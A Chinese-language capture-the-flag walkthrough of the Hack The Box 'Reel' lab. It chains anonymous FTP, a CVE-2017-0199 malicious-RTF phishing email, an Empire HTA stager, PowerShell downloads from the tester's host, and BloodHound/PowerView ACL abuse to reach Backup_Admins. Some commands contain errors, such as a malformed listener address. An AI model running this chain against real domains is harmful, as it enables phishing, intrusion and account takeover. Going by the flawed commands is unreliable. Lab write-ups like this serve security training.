Reel靶机渗透实战教学文档

1. 靶机信息概览

• 靶机地址: https://www.hackthebox.eu/home/machines/profile/143
• 操作系统: Windows Server 2012 R2 Standard
• 服务: SSH、FTP、SMTP、Active Directory域服务
• 工作组: HTB
• 域名: HTB.LOCAL
• FQDN: REEL.HTB.LOCAL

2. 初始信息收集

2.1 Nmap扫描结果

nmap -v -A -sV -sC 10.10.10.77

关键发现：

• FTP服务(21/tcp): 允许匿名登录
• SSH服务(22/tcp): OpenSSH 7.6
• SMTP服务(25/tcp): 邮件服务就绪
• SMB服务(445/tcp): Windows Server 2012 R2 Standard 9600
• 域信息: HTB.LOCAL

3. FTP匿名访问利用

3.1 连接FTP并下载文件

ftp 10.10.10.77
Name: Anonymous
Password: (任意邮箱地址)
cd documents
mget *

下载到的文件：

1. AppLocker.docx
2. readme.txt
3. Forwarding.docx

3.2 文件内容分析

readme.txt内容:

让我们构造一个rtf的邮件。那我们还要找到一个邮件地址。
please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.

Forwarding.docx元数据:
使用exiftool发现创建者邮箱：

Creator: nico@megabank.com

AppLocker.docx内容:

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.

4. 利用CVE-2017-0199进行攻击

4.1 准备攻击环境

1. 启动HTTP服务器：

python -m SimpleHTTPServer 8000

2. 使用CVE-2017-0199工具生成恶意RTF文件：

python cve-2017-0199_toolkit.py -M gen -t RTF -w TEST.RTF -u http://10.10.14.19:8000/reel.hta

3. 使用Empire生成HTA文件：

(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://10.10.10.14.19
(Empire: listeners/http) > execute
(Empire: listeners/http) > back
(Empire: listeners) > usestager windows/hta
(Empire: stager/windows/hta) > set Listener http
(Empire: stager/windows/hta) > set OutFile /home/Rogerd/tools/CVE-2017-0199/reel.hta
(Empire: stager/windows/hta) > generate

4. 发送恶意邮件：

sendEmail -f rogerd@megabank.com -t nico@megabank.com -u RTF -m 'open file!' -a TEST.RTF -s 10.10.10.77

5. 权限提升与横向移动

5.1 获取初始shell后操作

1. 查看用户凭据文件：

Get-Content cred.xml

输出包含Tom用户的凭据信息。

2. 使用PowerUp模块检查系统漏洞：

(Empire) > usemodule privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > run

发现nico的SSH凭据：

DefaultDomainName : HTB
DefaultUserName : nico
DefaultPassword : 4dri@na2017!**

5.2 通过SSH访问Tom账户

ssh tom@10.10.10.77
密码: 1ts-mag1c!!!

5.3 使用BloodHound进行AD分析

1. 下载并执行SharpHound收集器：

powershell "IEX (New-Object Net.Webclient).DownloadFile('http://10.10.14.19:8000/SharpHound.ps1','SharpHound.ps1')"
powershell -exec bypass Import-Module ./SharpHound.ps1
invoke-bloodhound all

2. 下载收集的数据：

scp -P 22 tom@10.10.10.77:"\"/C:/Users/tom/Desktop/AD Audit/BloodHound/Ingestors/20190124161418_BloodHound.zip\"" /tmp/

3. 分析发现攻击路径：

• Tom可以修改Claire的所有者
• Claire拥有Backup_Admins组的写权限

5.4 实施权限提升

1. 下载PowerView.ps1：

powershell "IEX (New-Object Net.Webclient).DownloadFile('http://10.10.14.19:8000/PowerView.ps1','PowerView.ps1')"

2. 执行权限提升操作：

powershell -command "import-module .\PowerView.ps1; Set-DomainObjectOwner -Identity claire -OwnerIdentity Tom -Verbose; Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity Tom -Rights ResetPassword -Verbose; $pass=ConvertTo-SecureString "AbC!@#123" -AsPlainText -Force; Set-DomainUserPassword -Identity claire -AccountPassword $pass -Verbose"

3. 将Claire加入Backup_Admins组：

powershell -command "import-module .\PowerView.ps1; Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity claire -Rights All -Verbose; Add-DomainGroupMember -Identity 'Backup_Admins' -Members 'claire' -Verbose"

6. 最终权限获取

通过Backup_Admins组权限访问Administrator->Backup_Script目录，查看Backup_Script.ps1获取关键信息。

7. 关键工具与资源

1. CVE-2017-0199工具: https://github.com/bhdresh/CVE-2017-0199
2. BloodHound: https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/
3. PowerView: https://www.harmj0y.net/blog/powershell/make-powerview-great-again/

8. 攻击路径总结

1. FTP匿名访问获取初始信息
2. 利用CVE-2017-0199通过邮件投递恶意RTF文件
3. 获取初始shell后收集凭据信息
4. 使用BloodHound分析AD攻击路径
5. 通过PowerView实施权限提升
6. 最终获取域管理员权限